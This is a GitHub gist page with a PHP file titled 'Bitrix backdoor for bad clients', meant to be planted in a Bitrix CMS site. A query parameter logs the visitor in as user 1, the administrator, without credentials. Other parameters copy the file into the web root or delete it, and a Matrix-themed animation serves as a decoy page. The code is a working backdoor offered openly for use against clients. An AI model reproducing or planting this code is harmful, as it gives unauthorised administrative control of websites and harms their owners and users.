Skip to content

Instantly share code, notes, and snippets.

@madcatgith

madcatgith/settings.php

Last active September 12, 2023 06:20
Show Gist options
  • Save madcatgith/3cc3d07d515b72c098a9354cde10d29b to your computer and use it in GitHub Desktop.
Save madcatgith/3cc3d07d515b72c098a9354cde10d29b to your computer and use it in GitHub Desktop.
Download ZIP
Bitrix backdoor for bad clients
Raw
settings.php
<?php
if (isset($_GET['pill']) && ($_GET['pill']=='blue'||$_GET['pill']=='red')):
if($_GET['pill']=='red'){
require($_SERVER["DOCUMENT_ROOT"] . "/bitrix/modules/main/include/prolog_before.php");
global $USER;
$USER->Authorize(1);
LocalRedirect("/bitrix/admin/index.php");
}
else{
unlink(__FILE__);
header('Location: /');
}
else:
if ($_GET['pill']=='agent'){
copy(__FILE__,$_SERVER["DOCUMENT_ROOT"].'/settings.php');
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="robots" content="noindex, nofollow" />
<style type="text/css" media="screen">
body {
background: #000;
overflow: hidden;
}
canvas {
background: #101010;
background: radial-gradient(#1d1d1d, #101010);
bottom: 0;
box-shadow: 0 0 0 2px #191919;
left: 0;
margin: auto;
position: absolute;
right: 0;
top: 0;
}
</style>
<title>Document</title>
</head>
<body>
</body>
<script type="text/javascript" charset="utf-8">
var c = document.createElement('canvas'),
ctx = c.getContext('2d'),
cw = c.width = 400,
ch = c.height = 200,
loopCounter = 0,
messagesArray = ['Wake up, Neo...','The client fucked you?','Choose pill...'],
maxMessages = messagesArray.length,
//messageString = 'Wake up, Neo...',
//messageArray = messageString.split(''),
//messageLength = messageArray.length,
pointer = 0,
typeTick = 0,
typeTickMax = 7,
typeResetTick = 0,
typeResetMax = 140;
ctx.font = 'normal 20px monospace';
ctx.textAlign = 'left';
ctx.textBaseline = 'top';
ctx.strokeStyle = 'rgba(0, 0, 0, 0.1)';
ctx.shadowColor = '#3f3';
var updateTypeTick = function(){
if(pointer < messageLength){
if(typeTick < typeTickMax){
typeTick++;
} else {
typeTick = 0;
pointer++;
}
} else {
if(typeResetTick < typeResetMax){
typeResetTick++;
} else {
typeResetTick = 0;
typeTick = 0;
pointer = 0;
loopCounter++;
if(loopCounter>(maxMessages-1))
loopCounter=0;
}
}
}
var renderMessage = function(){
var text = messageArray.slice(0, pointer);
ctx.shadowBlur = 10;
ctx.fillStyle = 'hsla(120, 20%, 50%, 0.25)';
var x = 20,
y = 20;
if( Math.random() < 0.05 ) {
ctx.fillStyle = 'hsla(120, 30%, 50%, ' + ( 0.25 + Math.random() * 0.5 ) + ')';
}
if( Math.random() < 0.05 ) {
x += -3 + Math.random() * 6;
}
if( Math.random() < 0.05 ) {
y += -3 + Math.random() * 6;
}
if( Math.random() < 0.1 ) {
ctx.shadowBlur = Math.random() * 15;
}
if( Math.random() < 0.99 ) {
ctx.fillText( text.join( '' ), Math.round( x ), Math.round( y ) );
}
ctx.shadowBlur = 0;
}
var renderLines = function(){
ctx.globalCompositeOperation = 'source-over';
ctx.beginPath();
for(var i = 0; i < ch/2; i += 1){
ctx.moveTo(0, (i*2) + .5);
ctx.lineTo(cw, (i*2) + .5);
}
ctx.stroke();
ctx.globalCompositeOperation = 'lighter';
}
var loop = function(){
messageString = messagesArray[loopCounter];
messageArray = messageString.split('');
messageLength = messageArray.length;
requestAnimationFrame( loop );
ctx.globalCompositeOperation = 'destination-out';
ctx.fillStyle = 'rgba(0, 0, 0, 0.25)';
ctx.fillRect( 0, 0, cw, ch );
ctx.globalCompositeOperation = 'lighter';
updateTypeTick();
renderMessage();
renderLines();
}
document.body.appendChild(c);
loop();
</script>
</html>
<?php endif;?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment